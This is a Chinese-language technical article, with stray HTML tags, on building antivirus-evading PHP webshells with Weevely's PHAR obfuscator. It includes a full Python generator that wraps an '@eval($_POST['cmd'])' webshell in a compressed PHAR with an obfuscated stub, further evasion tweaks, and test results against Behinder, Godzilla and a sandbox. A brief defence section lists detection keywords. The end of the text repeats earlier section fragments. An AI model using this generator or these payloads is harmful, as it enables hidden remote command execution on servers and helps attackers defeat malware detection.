Weevely管理工具免杀马研究及生成另类免杀马<\/h1>

一、背景与概述<\/h2>
Weevely是一款基于Python语言开发的渗透测试工具，主要用于在目标主机上执行远程操作，功能类似于中国菜刀。本文主要研究Weevely生成的PHP木马的免杀技术，特别是利用PHAR文件格式实现的免杀方法。<\/p>

二、Weevely客户端生成源码分析<\/h2>

1. Weevely目录结构<\/h3>

Weevely源码中包含以下关键目录：<\/p>

bd\/agent<\/code>：存放webshell代码执行的PHP代码<\/li>

bd\/obfuscators<\/code>：存放混淆代码执行的代码<\/li>
<\/ul>
2. 生成命令<\/h3>
生成木马的基本命令格式：<\/p>
weevely generate -agent obfpost_php -obfuscator obfusc1_php "An0ma1"<\/span> .\/An0ma1.php
<\/span><\/span><\/code><\/pre>其中：<\/p>

obfpost_php<\/code>：指定使用的agent类型<\/li>
obfusc1_php<\/code>：指定使用的混淆器<\/li>
An0ma1<\/code>：连接密码<\/li>
.\/An0ma1.php<\/code>：输出文件路径<\/li>
<\/ul>
3. 混淆器类型<\/h3>

cleartext1_php<\/code>：无混淆模式，直接输出代码执行的连接代码<\/li>
obfusc1_php<\/code>：基础混淆模式，但混淆力度不够，容易被杀<\/li>
phar<\/code>混淆器：重点研究对象，微步云沙箱报正常文件<\/li>
<\/ul>
三、PHAR文件格式详解<\/h2>
PHAR(PHP Archive)是PHP的归档文件格式，类似于JAR文件，可将多个PHP文件、资源打包为单一文件。<\/p>
1. PHAR文件结构<\/h3>
PHAR文件分为四部分：<\/p>

Stub部分<\/strong>：PHP可执行代码，必须以__HALT_COMPILER(); ?><\/code>结尾<\/li>
Manifest元数据<\/strong>：二进制数据，小端序<\/li>
数据存储<\/strong>：实际存储的文件内容<\/li>
签名部分<\/strong>：文件签名<\/li>
<\/ol>
2. PHAR文件示例<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> TestObject<\/span> {}
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>); \/\/ 后缀名必须为phar
<\/span><\/span><\/span><\/span>$phar-><\/span>startBuffering<\/span>(); \/\/ 开启缓存
<\/span><\/span><\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER();?>"<\/span>); \/\/ 设置stub
<\/span><\/span><\/span><\/span>$o =<\/span> new<\/span> TestObject<\/span>();
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($o); \/\/ 设置元数据
<\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>("An0ma1.txt"<\/span>, "An0ma1"<\/span>); \/\/ 添加数据存储
<\/span><\/span><\/span><\/span>$phar-><\/span>stopBuffering<\/span>(); \/\/ 结束后会自动签名
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. Manifest元数据结构<\/h3>



偏移量<\/th>
长度<\/th>
字段<\/th>
说明<\/th>
<\/tr>
<\/thead>


0x00<\/td>
4<\/td>
Manifest长度<\/td>
总长度<\/td>
<\/tr>

0x04<\/td>
4<\/td>
文件数量<\/td>
包含的文件数量<\/td>
<\/tr>

0x08<\/td>
2<\/td>
API版本<\/td>
PHAR版本<\/td>
<\/tr>

0x0A<\/td>
4<\/td>
全局标志<\/td>
压缩+SHA1签名<\/td>
<\/tr>

0x0E<\/td>
4<\/td>
别名长度<\/td>
无别名时为0<\/td>
<\/tr>

0x12<\/td>
4<\/td>
元数据类型<\/td>
无序列化metadata时为0<\/td>
<\/tr>
<\/tbody>
<\/table>
4. 数据存储结构<\/h3>



偏移量<\/th>
长度<\/th>
字段<\/th>
说明<\/th>
<\/tr>
<\/thead>


0x00<\/td>
4<\/td>
文件名长度<\/td>
文件名长度<\/td>
<\/tr>

0x04<\/td>
实际长度<\/td>
文件名内容<\/td>
ASCII字符<\/td>
<\/tr>

0x05<\/td>
4<\/td>
原始大小<\/td>
未压缩文件内容长度<\/td>
<\/tr>

0x09<\/td>
4<\/td>
Unix时间戳<\/td>
时间戳<\/td>
<\/tr>

0x0D<\/td>
4<\/td>
压缩后大小<\/td>
压缩后文件内容长度<\/td>
<\/tr>

0x11<\/td>
4<\/td>
CRC32校验值<\/td>
校验和计算值<\/td>
<\/tr>

0x15<\/td>
4<\/td>
权限+压缩标志<\/td>
权限与压缩标志组合<\/td>
<\/tr>

0x19<\/td>
4<\/td>
元数据长度<\/td>
无附加元数据时为0<\/td>
<\/tr>
<\/tbody>
<\/table>
四、免杀马原理分析<\/h2>
1. 免杀马模板代码<\/h3>
clean_agent =<\/span> agent.<\/span>strip(b<\/span>'<\/span>\n<\/span>'<\/span>)
<\/span><\/span>stub =<\/span> b<\/span>"""<?php include "<\/span>\\<\/span>160<\/span>\\<\/span>x68<\/span>\\<\/span>141<\/span>\\<\/span>x72<\/span>\\<\/span>72<\/span>\\<\/span>57<\/span>\\<\/span>57".basename(__FILE__)."<\/span>\\<\/span>57<\/span>\\<\/span>x78";__HALT_COMPILER(); ?>"""<\/span>
<\/span><\/span>fname =<\/span> b<\/span>'x'<\/span>
<\/span><\/span>f =<\/span> b<\/span>'<?php eval(<\/span>\'<\/span>'<\/span> +<\/span> clean_agent +<\/span> b<\/span>'<\/span>\'<\/span>);'<\/span>
<\/span><\/span>fenc =<\/span> zlib.<\/span>compress(f)[2<\/span>:-<\/span>4<\/span>]  # 去除zlib头尾<\/span>
<\/span><\/span>flags =<\/span> 0x00011000<\/span>
<\/span><\/span><\/code><\/pre>2. 关键免杀技术<\/h3>


Stub部分混淆<\/strong>：<\/p>

使用八进制和十六进制编码混淆路径<\/li>
包含basename(__FILE__)<\/code>动态获取文件名<\/li>
必须包含__HALT_COMPILER(); ?><\/code>标记<\/li>
<\/ul>
<\/li>

文件内容压缩<\/strong>：<\/p>

使用zlib压缩恶意代码<\/li>
去除zlib头尾([2:-4]<\/code>)<\/li>
设置压缩标志0x00001000<\/code>激活自动解压<\/li>
<\/ul>
<\/li>

权限设置<\/strong>：<\/p>

0o777 | 0x00001000<\/code>设置文件权限和压缩标志<\/li>
实际值为\xff\x11\x00\x00<\/code>(小端序)<\/li>
<\/ul>
<\/li>

签名部分<\/strong>：<\/p>

SHA1签名(20字节)<\/li>
签名类型0x0002<\/code>表示SHA1<\/li>
魔术签名GBMB<\/code>格式固定<\/li>
<\/ul>
<\/li>
<\/ol>
3. 自动解压机制<\/h3>
PHAR文件的自动解压依赖于文件条目中的压缩标志位0x00001000<\/code>(对应PharEntry::COMPRESSED<\/code>)，激活后PHP会自动解压文件内容。<\/p>
五、自写免杀马生成脚本<\/h2>
import<\/span> io
<\/span><\/span>import<\/span> zlib
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>import<\/span> argparse
<\/span><\/span>
<\/span><\/span>def<\/span> generate_phar<\/span>(agent_code: bytes) -><\/span> bytes:
<\/span><\/span>    # 清理输入代码<\/span>
<\/span><\/span>    clean_agent =<\/span> agent_code.<\/span>strip(b<\/span>'<\/span>\n<\/span>'<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 1. 构造Phar存根(路径混淆)<\/span>
<\/span><\/span>    stub =<\/span> b<\/span>"""<?php include "<\/span>\\<\/span>160<\/span>\\<\/span>x68<\/span>\\<\/span>141<\/span>\\<\/span>x72<\/span>\\<\/span>72<\/span>\\<\/span>57<\/span>\\<\/span>57".basename(__FILE__)."<\/span>\\<\/span>57<\/span>\\<\/span>x78";__HALT_COMPILER(); ?>"""<\/span>
<\/span><\/span>    
<\/span><\/span>    # 2. 构造内部恶意代码<\/span>
<\/span><\/span>    fname =<\/span> b<\/span>'x'<\/span>
<\/span><\/span>    f =<\/span> clean_agent
<\/span><\/span>    
<\/span><\/span>    # 3. 压缩内容(绕过基础检测)<\/span>
<\/span><\/span>    fenc =<\/span> zlib.<\/span>compress(f)[2<\/span>:-<\/span>4<\/span>]  # 移除zlib头尾<\/span>
<\/span><\/span>    
<\/span><\/span>    # 4. 初始化二进制流<\/span>
<\/span><\/span>    output =<\/span> io.<\/span>BytesIO()
<\/span><\/span>    output.<\/span>write(stub)
<\/span><\/span>    
<\/span><\/span>    # 5. 写入Manifest占位符<\/span>
<\/span><\/span>    manifest_len_cursor =<\/span> output.<\/span>tell()
<\/span><\/span>    output.<\/span>write(b<\/span>'<\/span>\0\0\0\0<\/span>'<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 6. 构建Manifest结构<\/span>
<\/span><\/span>    output.<\/span>write((1<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(b<\/span>'<\/span>\x11\x00<\/span>'<\/span>)
<\/span><\/span>    output.<\/span>write((0x00011000<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write((0<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write((0<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    
<\/span><\/span>    # 7. 写入文件条目<\/span>
<\/span><\/span>    output.<\/span>write(len(fname).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(fname)
<\/span><\/span>    output.<\/span>write(len(f).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(int(0<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(len(fenc).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(zlib.<\/span>crc32(f).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write((0o777<\/span> |<\/span> 0x00001000<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write((0<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    
<\/span><\/span>    # 8. 修正Manifest长度<\/span>
<\/span><\/span>    manifest_len =<\/span> output.<\/span>tell() -<\/span> manifest_len_cursor -<\/span> 4<\/span>
<\/span><\/span>    output.<\/span>seek(manifest_len_cursor)
<\/span><\/span>    output.<\/span>write(manifest_len.<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    
<\/span><\/span>    # 9. 追加压缩内容<\/span>
<\/span><\/span>    output.<\/span>seek(0<\/span>, io.<\/span>SEEK_END)
<\/span><\/span>    output.<\/span>write(fenc)
<\/span><\/span>    
<\/span><\/span>    # 10. 计算签名<\/span>
<\/span><\/span>    full_content =<\/span> output.<\/span>getvalue()
<\/span><\/span>    output.<\/span>write(hashlib.<\/span>sha1(full_content).<\/span>digest())
<\/span><\/span>    output.<\/span>write((0x0002<\/span>).<\/span>to_bytes(4<\/span>, 'little'<\/span>))
<\/span><\/span>    output.<\/span>write(b<\/span>'GBMB'<\/span>)
<\/span><\/span>    
<\/span><\/span>    return<\/span> base64.<\/span>b64encode(output.<\/span>getvalue())
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    code =<\/span> "<?php @eval($_POST['cmd']);?>"<\/span>
<\/span><\/span>    # 生成并输出Base64结果<\/span>
<\/span><\/span>    b64_phar =<\/span> generate_phar(code.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    print(f<\/span>"b64:<\/span>{<\/span>b64_phar.<\/span>decode('utf-8'<\/span>)}<\/span>"<\/span>)
<\/span><\/span>    with<\/span> open("123.php"<\/span>, "wb"<\/span>) as<\/span> f:
<\/span><\/span>        f.<\/span>write(base64.<\/span>b64decode(b64_phar))
<\/span><\/span>    print("Done!"<\/span>)
<\/span><\/span><\/code><\/pre>脚本说明<\/h3>

支持自定义恶意代码（可替换为冰蝎、哥斯拉、蚁剑的连接代码）<\/li>
生成Base64编码的PHAR文件<\/li>
自动写入到指定文件<\/li>
兼容PHP 5.3+版本<\/li>
<\/ol>
六、免杀马进一步魔改思路<\/h2>


Stub部分<\/strong>：<\/p>

__HALT_COMPILER(); ?><\/code>之前的代码可以任意修改<\/li>
路径混淆方式可以多样化<\/li>
<\/ul>
<\/li>

压缩方式<\/strong>：<\/p>

0x00002000<\/code>：Bzip2压缩<\/li>
0x0000F000<\/code>：压缩算法掩码<\/li>
替代默认的zlib压缩(0x00001000<\/code>)<\/li>
<\/ul>
<\/li>

权限设置<\/strong>：<\/p>

将0o777<\/code>改为0o750<\/code>等较低权限<\/li>
<\/ul>
<\/li>

签名类型<\/strong>：<\/p>

0x0001<\/code>：MD5签名<\/li>
0x0004<\/code>：OpenSSL签名<\/li>
<\/ul>
<\/li>

其他字段修改<\/strong>：<\/p>

文件名修改<\/li>
别名长度修改<\/li>
元数据类型修改<\/li>
API版本修改<\/li>
Unix时间戳修改<\/li>
全局标识修改<\/li>
<\/ul>
<\/li>
<\/ol>
七、防御措施<\/h2>


PHP配置<\/strong>：<\/p>
phar.readonly<\/span> =<\/span> On<\/span>
<\/span><\/span>allow_url_include<\/span> =<\/span> Off<\/span>
<\/span><\/span><\/code><\/pre><\/li>

禁用PHAR扩展<\/strong>：在生产环境中禁用不必要的PHAR扩展<\/p>
<\/li>

杀软检测策略<\/strong>：<\/p>

对web文件(php, phar, phtml, pht等)进行熵值检测<\/li>
查杀以下关键字的组合：

GMBN<\/code><\/li>
\xff\x11\x00\x00<\/code><\/li>
basename(__FILE__)<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

文件监控<\/strong>：<\/p>

监控服务器上异常的PHAR文件创建<\/li>
检查文件权限异常变化<\/li>
<\/ul>
<\/li>
<\/ol>
八、测试结果<\/h2>

冰蝎<\/strong>：测试成功<\/li>
哥斯拉<\/strong>：测试成功<\/li>
杀软绕过<\/strong>：

微步云沙箱报告为正常文件<\/li>
卡巴斯基可能使用熵值检测或关键词检测（如include "\160\x68\141\x72\72\57\57".basename(__FILE__)."\57\x78";__HALT_COMPILER(); ?><\/code>）<\/li>
<\/ul>
<\/li>
<\/ol>
九、总结<\/h2>
通过深入研究Weevely工具的PHAR混淆器实现原理，我们可以：<\/p>

理解PHAR文件格式的结构和特性<\/li>
掌握利用PHAR自动解压机制实现免杀的技术<\/li>
开发自定义的免杀马生成工具<\/li>
提出针对性的防御措施<\/li>
<\/ol>
这种免杀技术本质上是在PHAR文件中嵌入其他PHP代码（如冰蝎、哥斯拉、蚁剑的连接代码），利用PHAR文件的特性绕过常规检测，具有较高的隐蔽性和实用性。<\/p>

Weevely管理工具免杀马研究及生成另类免杀马<\/h1>

一、背景与概述<\/h2> Weevely是一款基于Python语言开发的渗透测试工具，主要用于在目标主机上执行远程操作，功能类似于中国菜刀。本文主要研究Weevely生成的PHP木马的免杀技术，特别是利用PHAR文件格式实现的免杀方法。<\/p>

二、Weevely客户端生成源码分析<\/h2>

三、PHAR文件格式详解<\/h2> PHAR(PHP Archive)是PHP的归档文件格式，类似于JAR文件，可将多个PHP文件、资源打包为单一文件。<\/p>

四、免杀马原理分析<\/h2>

3. 自动解压机制<\/h3> PHAR文件的自动解压依赖于文件条目中的压缩标志位0x00001000<\/code>(对应PharEntry::COMPRESSED<\/code>)，激活后PHP会自动解压文件内容。<\/p>

一、背景与概述<\/h2>
Weevely是一款基于Python语言开发的渗透测试工具，主要用于在目标主机上执行远程操作，功能类似于中国菜刀。本文主要研究Weevely生成的PHP木马的免杀技术，特别是利用PHAR文件格式实现的免杀方法。<\/p>

三、PHAR文件格式详解<\/h2>
PHAR(PHP Archive)是PHP的归档文件格式，类似于JAR文件，可将多个PHP文件、资源打包为单一文件。<\/p>

3. 自动解压机制<\/h3>
PHAR文件的自动解压依赖于文件条目中的压缩标志位`0x00001000<\/code>(对应PharEntry::COMPRESSED<\/code>)，激活后PHP会自动解压文件内容。<\/p>`